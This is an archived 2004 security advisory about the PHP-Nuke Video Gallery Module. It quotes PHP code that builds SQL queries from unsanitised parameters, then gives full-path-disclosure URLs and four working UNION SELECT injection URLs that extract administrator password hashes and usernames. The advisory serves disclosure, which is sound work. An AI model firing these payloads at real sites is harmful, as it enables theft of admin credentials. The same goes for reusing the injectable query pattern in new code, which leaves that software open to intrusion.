exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpnukeVideo.txt

phpnukeVideo.txt
Posted Apr 28, 2004
Authored by DarkBicho | Site darkbicho.tk

PHP-Nuke Video Gallery Module version 0.1 Beta 5 is susceptible to full path disclosure and SQL injection attacks.

tags | exploit, php, sql injection
SHA-256 | fe3ff118560c7e9a4f76a80601322a0fa94b9f122ffbe84c9212355bc5ab8523

phpnukeVideo.txt

Change Mirror Download
Adivore: http://bichosoft.webcindario.com/advisory-03.txt

===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================

PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: http://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE: 26/04/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com

===========================================================================
===========================================================================


Vulnerabilities:
---------------

1.- CODE:
¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
global $prefix, $dbi, $module_name;
$tipomime="application/unknown";
$next=next_clips($clipid, $catid);
$result=sql_query("select descripcion, url_thumb, url_preview, accesos from
".$prefix."_videos_clips where clipid=$clipid", $dbi);
list($descripcion, $url_thumb, $url_preview,
$accesos)=sql_fetch_row($result, $dbi);
$resultado=AbreTabla();
if ($next["previous"]){
$resultado.="<a
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
}
$resultado.="</td><td align=right>";
if ($next["next"]){
$resultado.="<a
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
}
$resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
if ($url_preview != ""){
$tipomime=tipomime($clipid, "clips");
$result2=sql_query("select class_id, options_object, options_embed from
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
list($class_id, $options_object, $options_embed)=sql_fetch_row($result2,
$dbi);
$resultado.="<center>".mete_video($url_preview, $tipomime, 160,
120)."</center>";

}
else{
$resultado.="<center><img src=\"$url_thumb\"></center>";
}
$resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
if (count_total($clipid, "clip", "ficheros") > 0){
$resultado.=CierraTabla().AbreTabla().clip_files($clipid,
$catid).CierraTabla();
}
else{
$resultado.=CierraTabla();
}
$accesos++;
sql_query("update ".$prefix."_videos_clips set accesos=$accesos where
clipid=$clipid", $dbi);
return "$resultado";
}

=========================================================================

2.- Full path disclosure:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.

A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286

B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286



3.- Sql injection:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨
This sql injection exploit can pull out from database any information,
for example
superadmin's username and password's md5 hash:


A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

c)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1

D)
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1


SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.

_________________________________________________________________
Charla con tus amigos en lĂ­nea mediante MSN Messenger:
http://messenger.latam.msn.com/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close